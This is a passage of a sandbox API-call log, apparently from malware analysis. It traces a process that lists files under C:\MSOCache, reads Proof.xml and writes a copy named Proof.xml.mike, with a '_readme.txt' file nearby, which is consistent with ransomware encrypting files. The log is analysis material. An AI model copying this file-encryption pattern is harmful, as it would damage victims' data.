ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe237be40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.285] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.286] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0040.286] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.286] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.286] CoTaskMemFree (pv=0x4fe370) [0040.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.286] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0040.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.286] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0040.286] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpFilePart=0x0) returned 0x48 [0040.286] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.286] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.287] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.287] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.287] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0040.287] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.287] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0040.287] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0040.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.288] GetFileType (hFile=0x264) returned 0x1 [0040.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0040.288] GetFileType (hFile=0x264) returned 0x1 [0040.288] CloseHandle (hObject=0x264) returned 1 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.288] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0040.289] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0040.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.289] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b5cfc | out: lpFileInformation=0x22b5cfc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2)) returned 1 [0040.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.289] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.289] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b6038 | out: lpFileInformation=0x22b6038*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2)) returned 1 [0040.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.289] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.289] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.289] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0040.290] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0040.290] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.290] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.290] GetFileType (hFile=0x264) returned 0x1 [0040.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.291] GetFileType (hFile=0x264) returned 0x1 [0040.291] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0040.291] WriteFile (in: hFile=0x264, lpBuffer=0x22b6fa8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22b6fa8*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0040.291] CloseHandle (hObject=0x264) returned 1 [0040.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.292] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b6a78 | out: lpFileInformation=0x22b6a78*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2)) returned 1 [0040.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.292] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0040.292] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.292] GetFileType (hFile=0x264) returned 0x1 [0040.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0040.292] GetFileType (hFile=0x264) returned 0x1 [0040.292] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0040.292] ReadFile (in: hFile=0x264, lpBuffer=0x22b80e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22b80e0*, lpNumberOfBytesRead=0x2af0c8*=0x5b2, lpOverlapped=0x0) returned 1 [0040.329] CloseHandle (hObject=0x264) returned 1 [0040.329] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.329] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.329] GetFileType (hFile=0x264) returned 0x1 [0040.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.330] GetFileType (hFile=0x264) returned 0x1 [0040.330] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0040.330] WriteFile (in: hFile=0x264, lpBuffer=0x22bd204*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22bd204*, lpNumberOfBytesWritten=0x2af0bc*=0x5c0, lpOverlapped=0x0) returned 1 [0040.330] CloseHandle (hObject=0x264) returned 1 [0040.331] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0040.331] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.331] GetFileType (hFile=0x264) returned 0x1 [0040.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0040.331] GetFileType (hFile=0x264) returned 0x1 [0040.332] WriteFile (in: hFile=0x264, lpBuffer=0x22c0440*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22c0440*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0040.332] CloseHandle (hObject=0x264) returned 1 [0040.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.333] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe237be40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0040.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.333] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22c1c58 | out: lpFileInformation=0x22c1c58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe237be40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe23ee260, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0040.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.333] SetFileAttributesW (lpFileName="C:\\MSOCache\\All 